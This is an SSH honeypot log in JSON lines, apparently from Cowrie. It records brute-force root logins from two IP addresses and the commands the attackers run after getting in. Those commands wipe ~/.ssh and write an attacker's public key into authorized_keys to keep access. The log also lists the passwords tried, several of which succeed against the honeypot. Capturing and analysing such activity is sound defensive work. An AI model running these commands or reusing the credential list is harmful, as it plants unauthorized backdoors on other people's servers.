{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:19.641832Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"qwerty","message":"login attempt [anonymous/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T23:36:19.873506Z","src_ip":"182.18.161.165","session":"b217c72e139c"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer456","message":"login attempt [root/Qwer456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:36:20.917575Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:21.128436Z","src_ip":"182.18.161.165","session":"b217c72e139c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:36:21.913927Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:36:21.914721Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:36:21.915689Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:22.228797Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:36:22.934179Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:36:22.934940Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:36:23.243981Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:23.244988Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58852,"dst_ip":"1.2.3.4","dst_port":22,"session":"45c1e064e0f7","protocol":"ssh","message":"New connection: 212.227.235.229:58852 (1.2.3.4:22) [session: 45c1e064e0f7]","sensor":"my-vps","timestamp":"2025-09-08T23:36:23.851955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:23.864879Z","src_ip":"212.227.235.229","session":"45c1e064e0f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:24.173702Z","src_ip":"212.227.235.229","session":"45c1e064e0f7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:36:25.792467Z","src_ip":"212.227.235.229","session":"45c1e064e0f7"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:27.106363Z","src_ip":"212.227.235.229","session":"45c1e064e0f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40976,"dst_ip":"1.2.3.4","dst_port":22,"session":"49818e66e434","protocol":"ssh","message":"New connection: 212.227.235.229:40976 (1.2.3.4:22) [session: 49818e66e434]","sensor":"my-vps","timestamp":"2025-09-08T23:36:27.413652Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:27.414286Z","src_ip":"212.227.235.229","session":"49818e66e434"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:27.727064Z","src_ip":"212.227.235.229","session":"49818e66e434"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:36:29.250294Z","src_ip":"212.227.235.229","session":"49818e66e434"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:29.564692Z","src_ip":"212.227.235.229","session":"49818e66e434"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:29.568481Z","src_ip":"212.227.235.229","session":"9086a2fb69b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:32.216213Z","src_ip":"212.227.235.229","session":"6420f373a308"}
{"eventid":"cowrie.session.closed","duration":180.67955088615417,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:32.221077Z","src_ip":"212.227.235.229","session":"6420f373a308"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":60450,"dst_ip":"1.2.3.4","dst_port":22,"session":"cded0682cda1","protocol":"ssh","message":"New connection: 45.150.34.92:60450 (1.2.3.4:22) [session: cded0682cda1]","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.374985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.375850Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.393142Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.504323Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:36:37.557889Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.558638Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.559692Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.578422Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:36:37.715364Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.716134Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.735970Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.736952Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":60462,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fd173db9da1","protocol":"ssh","message":"New connection: 45.150.34.92:60462 (1.2.3.4:22) [session: 1fd173db9da1]","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.752534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.753263Z","src_ip":"45.150.34.92","session":"1fd173db9da1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.770983Z","src_ip":"45.150.34.92","session":"1fd173db9da1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:36:37.884649Z","src_ip":"45.150.34.92","session":"1fd173db9da1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:38.905113Z","src_ip":"45.150.34.92","session":"1fd173db9da1"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":60470,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa91b482d1b2","protocol":"ssh","message":"New connection: 45.150.34.92:60470 (1.2.3.4:22) [session: aa91b482d1b2]","sensor":"my-vps","timestamp":"2025-09-08T23:36:38.921726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:36:38.922657Z","src_ip":"45.150.34.92","session":"aa91b482d1b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:36:38.939930Z","src_ip":"45.150.34.92","session":"aa91b482d1b2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:36:39.051826Z","src_ip":"45.150.34.92","session":"aa91b482d1b2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:39.071579Z","src_ip":"45.150.34.92","session":"cded0682cda1"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:36:39.072474Z","src_ip":"45.150.34.92","session":"aa91b482d1b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1773dd769e1","protocol":"ssh","message":"New connection: 212.227.235.229:6100 (1.2.3.4:22) [session: a1773dd769e1]","sensor":"my-vps","timestamp":"2025-09-08T23:36:42.131569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-08T23:36:42.280045Z","src_ip":"212.227.235.229","session":"a1773dd769e1"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T23:36:42.425029Z","src_ip":"212.227.235.229","session":"a1773dd769e1"}
